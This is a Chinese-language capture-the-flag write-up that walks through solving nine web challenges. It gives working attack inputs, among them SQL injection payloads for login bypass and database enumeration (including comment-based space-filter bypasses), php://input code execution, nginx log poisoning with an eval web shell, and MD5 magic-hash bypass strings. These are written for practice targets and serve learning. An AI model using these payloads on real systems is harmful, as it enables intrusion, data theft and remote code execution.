提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
一、web签到题
1.打开源代码,发现base64
2.打开Cybercher网站,进行解密,得到flag
二、web2
提示:最简单的SQL注入
用burpsuite输入,查看响应
1.万能账号
a' or true #
2.测试
测试长度,无回显
测试注入点
2为注入点
a' union select 1,2,3 #
3.爆数据库
web2
a' union select 1,database(),3 #
4.爆表名
a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2' #
5.爆字段
flag
a' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag' #
6.爆数据
a' union select 1,group_concat(flag),3 from web2.flag #
7.获得flag
三、web3
提示:更简单的web题
用burpsuite
?url=php://input
POST:
<?php system('ls');?>
<?php system("cat ctf_go_go_go");?>
四、web4
提示:文件包含、日志文件
?url=/var/log/nginx/access.log
UA头部:
<?php eval($_POST[1]);?>
蚁剑连接
找到flag.txt文件,得到flag
五、web5
<?php
$flag="";
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
if(!ctype_alpha($v1)){
die("v1 error");
}
if(!is_numeric($v2)){
die("v2 error");
}
if(md5($v1)==md5($v2)){
echo $flag;
}
}else{
echo "where is flag?";
}
?>
ctype_alpha:检测函数,用来检测所给参数是不是字母的函数。
is_numeric : 检测变量是否为数字或数字字符串
使用科学计数法
v1需要输入字母:QNKCDZO
v2需要输入数字:240610708
?v1=QNKCDZO&v2=240610708
六、web6
sql注入,过滤了空格
1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/web2.flag/**/#
七、web7
浏览页面时,发现点进文章中,网站后会带有?id=1
由此得知,本题是sql注入题
空格过滤
1.测试注入长度
?id=1'/**/order/**/by/**/3/**/#
2.测试注入点
2,3皆为注入点
?id=1'/**/union/**/select/**/1,2,3/**/#
3.爆数据
?id=1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/web7.flag#
八、web8(未做)
九、web9
ffifdyop:md5的万能密码